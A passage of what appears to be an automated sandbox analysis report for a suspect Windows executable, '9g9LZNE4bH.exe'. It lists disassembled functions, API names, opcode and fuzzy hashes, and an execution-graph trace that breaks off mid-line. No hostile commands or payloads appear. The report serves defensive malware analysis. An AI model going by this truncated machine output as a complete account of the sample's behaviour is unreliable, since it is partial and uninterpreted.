                                                                                                                                                                                                                                        • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4170891091-0
                                                                                                                                                                                                                                        • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                        • Instruction ID: 999691bae8b49fecbca7c1a0b76e9d0ce3c83a392617e9512f0710236e221ae3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D51E872F0C111CAFB14EF64A951ABCA765BB54398FB00135DE1D526E5EF38E809C711
                                                                                                                                                                                                                                        Function 00007FF78DA657EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2780335769-0
                                                                                                                                                                                                                                        • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                        • Instruction ID: 676869768b9c2ed2e92e6f669298153e27006476215f17bd70dfff3e8bfb5d1c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8515D22E0C6418AFB10EFB1E4507BDA3B1BB48B58FB44435DE4957689EF39D849C722
                                                                                                                                                                                                                                        Function 00007FF78DA520C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1956198572-0
                                                                                                                                                                                                                                        • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                        • Instruction ID: 03e0550839d606f21aba8e6bc4f3cb1ad0373f3e01ede3794949e2d389140e3e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B11E931B5C14242F654A7A9F548ABA9261FF84780FF44130DB4947BC9ED2DDC89C211
                                                                                                                                                                                                                                        Function 00007FF78DA75B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: ?
                                                                                                                                                                                                                                        • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                        • Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                                        • Instruction ID: cf5f229285d5f1b5bad3368ca1dff7463308b852b6448e956f6c752483df55a7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9411B12A0C78245FB24AB25A441B7AD690FB90BA4FB44235EF9C06AD5FF3DDC45C711
                                                                                                                                                                                                                                        Function 00007FF78DA69084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF78DA690B6
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA6A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF78DA72D92,?,?,?,00007FF78DA72DCF,?,?,00000000,00007FF78DA73295,?,?,?,00007FF78DA731C7), ref: 00007FF78DA6A9CE
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA6A9B8: GetLastError.KERNEL32(?,?,?,00007FF78DA72D92,?,?,?,00007FF78DA72DCF,?,?,00000000,00007FF78DA73295,?,?,?,00007FF78DA731C7), ref: 00007FF78DA6A9D8
                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF78DA5CC15), ref: 00007FF78DA690D4
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                        • API String ID: 3580290477-3807041592
                                                                                                                                                                                                                                        • Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                                        • Instruction ID: 1dcd97196c177f86636857d5f62d8ded1935fd15860b051534bb418523fe64f7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76417036A0C602C5E754BF65A8408B9A395FB48B94BF54035E94D53B85EF3CD889C362
                                                                                                                                                                                                                                        Function 00007FF78DA6CCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                                        • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                        • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                        • Instruction ID: 0efbc6a871346ba18dc5002c99e2e9583dcc33c369cb90dbca7ce8b0c98a816b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE41B323B1CA81C1DB20AF65E8447A9AB60FB88794FA04031EE4D87B98FF3CD805C751
                                                                                                                                                                                                                                        Function 00007FF78DA6F628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentDirectory
                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                        • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                        • Opcode ID: 3c906c99ff6b46cc0de181ba7a1caf37579b2c2fe8814107475e6c290f9e88a5
                                                                                                                                                                                                                                        • Instruction ID: 5caf77bb7a427f7bcc5ee072635b860c76652069f9402c3a4dde291d2f2b1d77
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c906c99ff6b46cc0de181ba7a1caf37579b2c2fe8814107475e6c290f9e88a5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E121A562A0C681C2EB24AB55E04467DA3B1FB84B44FF54035DB8D43694EF7CDD49CB62
                                                                                                                                                                                                                                        Function 00007FF78DA5FDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                        • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                        • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                        • Instruction ID: c29bbc9e51ddcaffc4fb6b46f2ff59d26d71bc30c6d5363a6c18b44b13bb589c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28111C3261DB8182EB619B15F440669B7E4FB88B88FA84230EECD47759EF3CD955CB01
                                                                                                                                                                                                                                        Function 00007FF78DA707AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                        • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                        • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                        • Instruction ID: f42e1ba49de68c67b6419abf6421ce930fcc994f958dc09475f3b5992b0d5890
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB01216291C64285F720BF60A465A7EA3B0FF44B48FF40435D58D86695FF2CE948CA26

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:8.2%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                        Signature Coverage:0.4%
                                                                                                                                                                                                                                        Total number of Nodes:462
                                                                                                                                                                                                                                        Total number of Limit Nodes:33
                                                                                                                                                                                                                                        execution_graph 21697 7ff78da5ccac 21706 7ff78da5ce7c 21697->21706 21699 7ff78da5cd3c __scrt_release_startup_lock 21703 7ff78da5cd48 21699->21703 21700 7ff78da5ccc0 __scrt_acquire_startup_lock 21700->21699 21705 7ff78da5cd0b 21700->21705 21701 7ff78da5cd91 __scrt_get_show_window_mode 21702 7ff78da5cd9e 21701->21702 21710 7ff78da51000 21702->21710 21703->21701 21707 7ff78da5ce84 21706->21707 21708 7ff78da5ce90 __scrt_dllmain_crt_thread_attach 21707->21708 21709 7ff78da5ce99 21708->21709 21709->21700 21711 7ff78da51009 21710->21711 21754 7ff78da536b0 21711->21754 21713 7ff78da53804 21753 7ff78da53808 21713->21753 21761 7ff78da51950 21713->21761 21715 7ff78da53825 21729 7ff78da5383c 21715->21729 21785 7ff78da545b0 21715->21785 21717 7ff78da5392b 21718 7ff78da5396a 21717->21718 21789 7ff78da57f80 21717->21789 21800 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 21718->21800 21721 7ff78da5395d 21722 7ff78da53962 21721->21722 21724 7ff78da53984 21721->21724 21796 7ff78da600bc 21722->21796 21724->21724 21725 7ff78da51950 39 API calls 21724->21725 21726 7ff78da539ce 21725->21726 21727 7ff78da539de 21726->21727 21726->21729 21801 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 21727->21801 21730 7ff78da53b2f 21729->21730 21732 7ff78da53a60 21729->21732 21802 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 21730->21802 21733 7ff78da53c50 21732->21733 21734 7ff78da53c61 21732->21734 21735 7ff78da53ced 21732->21735 21737 7ff78da53cc8 21732->21737 21733->21734 21733->21737 21803 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 21734->21803 21735->21737 21738 7ff78da53d12 21735->21738 21739 7ff78da53da7 SetDllDirectoryW LoadLibraryExW 21737->21739 21740 7ff78da53dc4 21737->21740 21804 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 21738->21804 21739->21740 21741 7ff78da53de8 SetDllDirectoryW 21740->21741 21750 7ff78da53e0a 21741->21750 21743 7ff78da53ffc 21744 7ff78da54029 21743->21744 21745 7ff78da54006 PostMessageW GetMessageW 21743->21745 21778 7ff78da53360 21744->21778 21745->21744 21746 7ff78da53f1b 21748 7ff78da53f41 PostMessageW GetMessageW 21746->21748 21751 7ff78da53f64 21746->21751 21746->21753 21748->21751 21749 7ff78da54039 21750->21743 21750->21746 21751->21753 21805 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 21751->21805 21753->21705 21755 7ff78da5c8c0 21754->21755 21756 7ff78da536bc GetModuleFileNameW 21755->21756 21757 7ff78da536eb GetLastError 21756->21757 21758 7ff78da53710 21756->21758 21760 7ff78da53706 21757->21760 21806 7ff78da592f0 FindFirstFileExW 21758->21806 21760->21713 21762 7ff78da545b0 15 API calls 21761->21762 21763 7ff78da51985 21762->21763 21764 7ff78da51c43 21763->21764 21765 7ff78da57f80 19 API calls 21763->21765 21764->21715 21766 7ff78da519cb 21765->21766 21777 7ff78da519e9 21766->21777 21809 7ff78da60744 21766->21809 21768 7ff78da600bc 5 API calls 21768->21764 21769 7ff78da519e5 21769->21777 21813 7ff78da6040c 21769->21813 21771 7ff78da51a20 21772 7ff78da60744 2 API calls 21771->21772 21771->21777 21773 7ff78da51b01 21772->21773 21774 7ff78da6040c _fread_nolock 19 API calls 21773->21774 21773->21777 21775 7ff78da51b4a 21774->21775 21775->21777 21816 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 21775->21816 21777->21768 21906 7ff78da56350 21778->21906 21780 7ff78da5336e 21784 7ff78da5338d 21780->21784 21922 7ff78da564f0 21780->21922 21782 7ff78da53381 21782->21784 21950 7ff78da56040 21782->21950 21784->21749 21786 7ff78da545bc 21785->21786 22005 7ff78da66004 21786->22005 21788 7ff78da54606 21788->21717 21790 7ff78da57fa4 21789->21790 21791 7ff78da60744 2 API calls 21790->21791 21792 7ff78da5807b 21790->21792 21794 7ff78da57fc0 21791->21794 21792->21721 21793 7ff78da60744 2 API calls 21793->21794 21794->21792 21794->21793 21795 7ff78da6040c _fread_nolock 19 API calls 21794->21795 21795->21794 21797 7ff78da600ec 21796->21797 22054 7ff78da5fe98 21797->22054 21799 7ff78da60105 21799->21718 21800->21753 21801->21753 21802->21753 21803->21753 21804->21753 21805->21753 21807 7ff78da5932f FindClose 21806->21807 21808 7ff78da59342 21806->21808 21807->21808 21808->21760 21810 7ff78da60774 21809->21810 21817 7ff78da604d4 21810->21817 21812 7ff78da6078d 21812->21769 21838 7ff78da6042c 21813->21838 21815 7ff78da60424 21815->21771 21816->21777 21818 7ff78da6053e 21817->21818 21820 7ff78da604fe 21817->21820 21818->21820 21821 7ff78da60658 21818->21821 21820->21812 21822 7ff78da6069d 21821->21822 21824 7ff78da60688 21821->21824 21825 7ff78da60570 21822->21825 21824->21820 21826 7ff78da605f3 21825->21826 21827 7ff78da6058a 21825->21827 21826->21824 21827->21826 21829 7ff78da6c2f4 21827->21829 21830 7ff78da6c324 21829->21830 21833 7ff78da6c1a4 21830->21833 21832 7ff78da6c33d 21832->21826 21834 7ff78da6c1cb 21833->21834 21835 7ff78da6c1e2 SetFilePointerEx 21834->21835 21837 7ff78da6c1d1 21834->21837 21836 7ff78da6c1fa GetLastError 21835->21836 21835->21837 21836->21837 21837->21832 21839 7ff78da60456 21838->21839 21840 7ff78da60485 21838->21840 21839->21840 21841 7ff78da60465 21839->21841 21842 7ff78da604a2 21839->21842 21840->21815 21843 7ff78da6047a _invalid_parameter_noinfo 21841->21843 21845 7ff78da601ac 21842->21845 21843->21840 21848 7ff78da601f5 21845->21848 21852 7ff78da601db _fread_nolock 21845->21852 21846 7ff78da601f0 _invalid_parameter_noinfo 21846->21848 21848->21840 21849 7ff78da601e5 21849->21846 21851 7ff78da602e1 _invalid_parameter_noinfo 21851->21852 21852->21848 21852->21849 21852->21851 21853 7ff78da6bacc 21852->21853 21884 7ff78da6bf1c 21852->21884 21854 7ff78da6baf4 21853->21854 21855 7ff78da6bb0d 21853->21855 21854->21852 21855->21854 21857 7ff78da6bb61 21855->21857 21858 7ff78da6bb92 21855->21858 21856 7ff78da6bef9 _invalid_parameter_noinfo 21856->21854 21857->21856 21859 7ff78da6bbf3 21858->21859 21860 7ff78da6bbb9 21858->21860 21864 7ff78da6bbc6 21858->21864 21890 7ff78da6d66c 21859->21890 21860->21864 21866 7ff78da6bbe2 21860->21866 21862 7ff78da6bc04 21894 7ff78da6a9b8 21862->21894 21867 7ff78da6bbd2 _invalid_parameter_noinfo 21864->21867 21865 7ff78da6bc0e 21868 7ff78da6a9b8 _fread_nolock 2 API calls 21865->21868 21869 7ff78da6bd8e 21866->21869 21872 7ff78da6bd21 GetConsoleMode 21866->21872 21883 7ff78da6bc1d _fread_nolock 21867->21883 21870 7ff78da6bc15 21868->21870 21871 7ff78da6bd93 ReadFile 21869->21871 21879 7ff78da6c2f4 _fread_nolock 2 API calls 21870->21879 21870->21883 21874 7ff78da6bead GetLastError 21871->21874 21875 7ff78da6bdb9 21871->21875 21872->21869 21876 7ff78da6bd35 21872->21876 21873 7ff78da6a9b8 _fread_nolock 2 API calls 21873->21854 21874->21883 21875->21874 21878 7ff78da6bd82 21875->21878 21876->21871 21877 7ff78da6bd3f ReadConsoleW 21876->21877 21877->21878 21880 7ff78da6bd63 GetLastError 21877->21880 21881 7ff78da6bdf2 21878->21881 21878->21883 21879->21866 21880->21883 21898 7ff78da6b6e4 ReadFile GetLastError SetFilePointerEx GetLastError _fread_nolock 21881->21898 21883->21873 21885 7ff78da6bf39 21884->21885 21887 7ff78da6bf64 21884->21887 21886 7ff78da6bf3e _invalid_parameter_noinfo 21885->21886 21889 7ff78da6bf49 21886->21889 21887->21889 21899 7ff78da6b9ac 21887->21899 21889->21852 21892 7ff78da6d6b5 21890->21892 21893 7ff78da6d67b 21890->21893 21891 7ff78da6d69e HeapAlloc 21891->21892 21891->21893 21892->21862 21893->21891 21893->21892 21895 7ff78da6a9bd RtlFreeHeap 21894->21895 21896 7ff78da6a9e5 _fread_nolock 21894->21896 21895->21896 21897 7ff78da6a9d8 GetLastError 21895->21897 21896->21865 21897->21896 21898->21883 21900 7ff78da6ba06 21899->21900 21905 7ff78da6b9d6 21899->21905 21901 7ff78da6ba1f 21900->21901 21902 7ff78da6ba7b 21900->21902 21903 7ff78da6ba32 _invalid_parameter_noinfo 21901->21903 21904 7ff78da6bacc _fread_nolock 14 API calls 21902->21904 21902->21905 21903->21905 21904->21905 21905->21889 21907 7ff78da56365 21906->21907 21908 7ff78da563aa 21907->21908 21910 7ff78da563cd 21907->21910 21963 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 21908->21963 21913 7ff78da56403 21910->21913 21964 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 21910->21964 21912 7ff78da5641b 21915 7ff78da56459 21912->21915 21916 7ff78da56439 21912->21916 21913->21912 21914 7ff78da59070 LoadLibraryExW 21913->21914 21914->21912 21959 7ff78da59070 21915->21959 21965 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 21916->21965 21919 7ff78da563c3 21919->21780 21920 7ff78da56466 21920->21919 21921 7ff78da5648a GetLastError 21920->21921 21921->21919 21923 7ff78da56516 21922->21923 21924 7ff78da5651e 21923->21924 21925 7ff78da5652f 21923->21925 21966 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 21924->21966 21927 7ff78da5653b 21925->21927 21928 7ff78da5654c 21925->21928 21967 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 21927->21967 21931 7ff78da5655c 21928->21931 21933 7ff78da5656d 21928->21933 21930 7ff78da5652a 21930->21782 21968 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 21931->21968 21934 7ff78da5658c 21933->21934 21935 7ff78da5659d 21933->21935 21969 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 21934->21969 21937 7ff78da565ac 21935->21937 21938 7ff78da565bd 21935->21938 21970 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 21937->21970 21940 7ff78da565cc 21938->21940 21941 7ff78da565dd 21938->21941 21971 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 21940->21971 21943 7ff78da565ec 21941->21943 21944 7ff78da565fd 21941->21944 21972 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 21943->21972 21946 7ff78da5660f 21944->21946 21948 7ff78da56620 21944->21948 21973 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 21946->21973 21948->21930 21974 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 21948->21974 21951 7ff78da56060 21950->21951 21951->21951 21952 7ff78da56089 21951->21952 21958 7ff78da560a0 21951->21958 21991 7ff78da52710 MessageBoxW MessageBoxA GetCurrentProcessId 21952->21991 21954 